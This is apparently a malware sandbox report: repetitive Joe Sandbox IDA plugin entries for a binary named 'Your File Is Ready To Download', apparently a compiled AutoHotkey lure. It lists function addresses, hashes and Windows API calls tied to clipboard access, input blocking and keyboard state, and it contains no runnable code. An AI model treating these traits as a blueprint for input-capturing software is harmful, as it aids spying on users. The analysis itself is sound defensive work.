Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$BlockClipboardCloseGlobalInputMessagePeekUnlock
String ID:
API String ID: 3677732381-0
Opcode ID: b6adeebde1c8d682402a109a9279e4306ad60e5876fb0eaa9a635a982790e88b
Instruction ID: 3b8e36c1247a58303e6f226d53f665e908a8770f35cd4797da3ac22da9bb71ab
Opcode Fuzzy Hash: b6adeebde1c8d682402a109a9279e4306ad60e5876fb0eaa9a635a982790e88b
Instruction Fuzzy Hash: EA814A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5A47AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003805E, Relevance: 10.7, APIs: 7, Instructions: 167keyboardwindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127
BlockInput.USER32 ref: 0000000140038060

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$BlockClipboardCloseGlobalInputMessagePeekUnlock
String ID:
API String ID: 3677732381-0
Opcode ID: 775dde92616c78ebeb5a36f7d6d8db95d522d84c17d1e49c68ab41f914c009b9
Instruction ID: afa2a868ed7631c5bca4cb2bc1655b2219ae853c8539f684e42b888ef00cafb2
Opcode Fuzzy Hash: 775dde92616c78ebeb5a36f7d6d8db95d522d84c17d1e49c68ab41f914c009b9
Instruction Fuzzy Hash: C8813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5A476F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003845A, Relevance: 10.7, APIs: 7, Instructions: 166windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127
OutputDebugStringW.KERNEL32 ref: 0000000140038461

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseDebugGlobalMessageOutputPeekStringUnlock
String ID:
API String ID: 1875564215-0
Opcode ID: 70f389a3415d445527e387d132d3a14c1e62a7841f17d8627a779c81c58943c5
Instruction ID: e0ae428173d4036d503dae637120ca782d8a112a0ecc1bb6ecd56eaa0f72cc28
Opcode Fuzzy Hash: 70f389a3415d445527e387d132d3a14c1e62a7841f17d8627a779c81c58943c5
Instruction Fuzzy Hash: 74813B31604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5947AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140015224, Relevance: 10.7, APIs: 7, Instructions: 155keyboardthreadCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 00000001400160C2
GetKeyState.USER32 ref: 00000001400160D5
GetForegroundWindow.USER32 ref: 0000000140016121
GetWindowThreadProcessId.USER32 ref: 000000014001612C
AttachThreadInput.USER32 ref: 0000000140016169

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: StateThreadWindow$AttachForegroundInputProcess
String ID:
API String ID: 1229699718-0
Opcode ID: a2b0cc0086029fdb757a06575e5eeaf16cfcd2d264a45fe096f562736b3ee843
Instruction ID: 2ad539e298d6ef03f932bc59e02795c311250da9ed8414acf218e6efff38d06e
Opcode Fuzzy Hash: a2b0cc0086029fdb757a06575e5eeaf16cfcd2d264a45fe096f562736b3ee843
Instruction Fuzzy Hash: DF71E2325046C0CAF76B9B36A8443E93BA1E34D799F180119FB560F6F2CB3AC885CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140015237, Relevance: 10.7, APIs: 7, Instructions: 155keyboardthreadCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 00000001400160C2
GetKeyState.USER32 ref: 00000001400160D5
GetForegroundWindow.USER32 ref: 0000000140016121
GetWindowThreadProcessId.USER32 ref: 000000014001612C
AttachThreadInput.USER32 ref: 0000000140016169

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: StateThreadWindow$AttachForegroundInputProcess
String ID:
API String ID: 1229699718-0
Opcode ID: 174f8e8503b4a2e05e1283a16a3c1acb478b98295829aa6f578923634267ac6a
Instruction ID: 09ecf516732d50b82f019e974623479a18dad599397fcac9ebe0efdf26a8c879
Opcode Fuzzy Hash: 174f8e8503b4a2e05e1283a16a3c1acb478b98295829aa6f578923634267ac6a
Instruction Fuzzy Hash: EA71D2325046C0CAF76B9B36A8443E93BA1E35D799F184119FB560F6F2CB3AC985CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C93AC, Relevance: 10.6, APIs: 7, Instructions: 98COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001400C93D5

Part of subcall function 00000001400CDC54: _amsg_exit.LIBCMT ref: 00000001400CDC7E

RtlDecodePointer.NTDLL(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9408
DecodePointer.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9426
DecodePointer.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9466
DecodePointer.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9480
DecodePointer.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000001400C9599,?,?,00000000,00000001400CDC83,?,?,00000000,00000001400CD065), ref: 00000001400C9490
ExitProcess.KERNEL32 ref: 00000001400C951C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: DecodePointer$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3411037476-0
Opcode ID: d463f9a7a04f441f5f92512035965f4a65b9f0abf1ab234d91880605039d61d1
Instruction ID: 494cfdddd2c0364b8ee9aee5854cb180954b453142497e3a66222978a8497a00
Opcode Fuzzy Hash: d463f9a7a04f441f5f92512035965f4a65b9f0abf1ab234d91880605039d61d1
Instruction Fuzzy Hash: 57417C3121AB8081FA5AAF13F8847D972A4BB8CBC4F140025FB8D47BB9EF78C4568711

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D1E84, Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001400D1EA7
_errno.LIBCMT ref: 00000001400D1EAF

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 4093a871b7decc5d353a457439ec97ba982effba3839932d5df7a13d57b19109
Instruction ID: 4820451ea1fe19a347114eaaa9b8a110df9fcf6019238f63dacbabb06c65991c
Opcode Fuzzy Hash: 4093a871b7decc5d353a457439ec97ba982effba3839932d5df7a13d57b19109
Instruction Fuzzy Hash: 1521057231464065F61B6F2798453ED76516BCCBE5F4A4216FF290B3F2CB788882D720

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000274F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64threadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,AutoHotkey v1.1.33.06,Unk,00000001400B3729), ref: 0000000140002A33
GetWindowThreadProcessId.USER32 ref: 0000000140002A4A
GetClassNameW.USER32 ref: 0000000140002A6C
IsDialogMessageW.USER32 ref: 0000000140002AAE
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,AutoHotkey v1.1.33.06,Unk,00000001400B3729), ref: 0000000140002ADE

Strings

#32770, xrefs: 0000000140002A79

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ClassCurrentDialogDirectoryForegroundMessageNameProcessThread
String ID: #32770
API String ID: 2633243691-463685578
Opcode ID: 66b86016b8e0ec6d327a662b3c344106b27a3a6adfda018855c6e75e934b5235
Instruction ID: e10d809552e135f65f302e20a0a8a9ebce2db2749f92cb0cff84000efc484814
Opcode Fuzzy Hash: 66b86016b8e0ec6d327a662b3c344106b27a3a6adfda018855c6e75e934b5235
Instruction Fuzzy Hash: 173108B160968586FF67DF17E8543E937A0A78DBC4F480026EB0A173B4DF78D586C611

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140031F30, Relevance: 9.3, APIs: 6, Instructions: 309windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: adc8d7f3167759a303d5bf32d572ad761c8dfa20239f91cd3868e4050556fb9e
Instruction ID: 53a9499f3d9918ae4eb51fd91a74910483bae15a62386d0d910133d5dab512fd
Opcode Fuzzy Hash: adc8d7f3167759a303d5bf32d572ad761c8dfa20239f91cd3868e4050556fb9e
Instruction Fuzzy Hash: 51E18E32604B8089E7678B66E8443EA77A1FB8DBD4F544216EF9947BF5DB38D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036D5A, Relevance: 9.3, APIs: 6, Instructions: 270windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7fa52b3680945060c860e7a3d66599f75cf20c9bc2079a1efab547494ec35dbe
Instruction ID: 591696fce92b75d3744b1d2efe0945c4937f8228c70a6ebd845775a458278747
Opcode Fuzzy Hash: 7fa52b3680945060c860e7a3d66599f75cf20c9bc2079a1efab547494ec35dbe
Instruction Fuzzy Hash: B3C18E3160474086EB6B9B27E4503EA77A2BB8DBD4F544216FB5A4B7F6DB38D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036B05, Relevance: 9.2, APIs: 6, Instructions: 208windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 416744ce18451341b3fbdc67a540a789ff393108833236a27645ea7bdc2c79d7
Instruction ID: 6c3cf5003ee63e9b42baaa8ebd4d232ad00fd66f38ba021e0febfeb5fcaf7a93
Opcode Fuzzy Hash: 416744ce18451341b3fbdc67a540a789ff393108833236a27645ea7bdc2c79d7
Instruction Fuzzy Hash: CBA16C3160474086FB6B8B27E8443EA77A2E79DBD4F544116FB598BAF6DB38D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032A18, Relevance: 9.2, APIs: 6, Instructions: 203windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: a309be330ca9334b05823b44ec4742211a3c56bfaf2c82f09ef315cb6cf1febd
Instruction ID: 2c171e70729c36c72c5bff54c048136c0d29415413b62255bbfc73cea0b5ef39
Opcode Fuzzy Hash: a309be330ca9334b05823b44ec4742211a3c56bfaf2c82f09ef315cb6cf1febd
Instruction Fuzzy Hash: C6A12A32605B408AEB6B8B26A8843EA77A1F78DBD4F544116EF5947AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003248B, Relevance: 9.2, APIs: 6, Instructions: 199windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: a7cca2c252c93e3aa9b7d8d848247703cda9506bc1b77ecf7367d3cbc826fe27
Instruction ID: ee8894d38df8eb54cf3a14c1f72ed7a2ec911b4a6b8309ed2c63368afb02bca9
Opcode Fuzzy Hash: a7cca2c252c93e3aa9b7d8d848247703cda9506bc1b77ecf7367d3cbc826fe27
Instruction Fuzzy Hash: B2A16D32601B8085FB6B8B2AE8443EA77A1FB4DBE4F544215EF5A476F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032A2B, Relevance: 9.2, APIs: 6, Instructions: 199windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 28c4f5d343f3a8596afdbbb28552e9644440dad148f2d06cb6c1df15be16f5df
Instruction ID: 421236e7e0f019e6a0e37e8d755665b7293354c93a9a77f8b0f47f85c12fbf72
Opcode Fuzzy Hash: 28c4f5d343f3a8596afdbbb28552e9644440dad148f2d06cb6c1df15be16f5df
Instruction Fuzzy Hash: 95A13B32605B408AEB6B8B26E8843EA77A1F78DBD4F544116EF9947BF5DB38C485C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036CB8, Relevance: 9.2, APIs: 6, Instructions: 198windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Part of subcall function 00000001400C8EEC: _errno.LIBCMT ref: 00000001400C8F04
Part of subcall function 00000001400C8EEC: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C8F0F

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID:
API String ID: 130734711-0
Opcode ID: 0dcf5ea3c63da5708149ac03f797763fd15c22fd54ce0b7ffe93f93eeff76ba6
Instruction ID: d1e73206e0052a3ffdf35ec5addd437243aa3856fcba2173ed7d06034429a506
Opcode Fuzzy Hash: 0dcf5ea3c63da5708149ac03f797763fd15c22fd54ce0b7ffe93f93eeff76ba6
Instruction Fuzzy Hash: D1A15931604B4086FB6B8B2BE8543EA67A2F78DBD4F544116FB5947AF6DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032A9D, Relevance: 9.2, APIs: 6, Instructions: 195windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 8e8dbd734feb23d6ff0dcbc09d08d8c4d988a3d477a099b7933ee9c0ec697311
Instruction ID: 39badc74fa4f91a4bc73c4a35219e47850ed66246964b97c573de9284211751c
Opcode Fuzzy Hash: 8e8dbd734feb23d6ff0dcbc09d08d8c4d988a3d477a099b7933ee9c0ec697311
Instruction Fuzzy Hash: 19A12931605B408AEB6B8B26E8843EA77A1F78DBD4F544216EF5947BF5DB38C485C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032A6E, Relevance: 9.2, APIs: 6, Instructions: 194windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
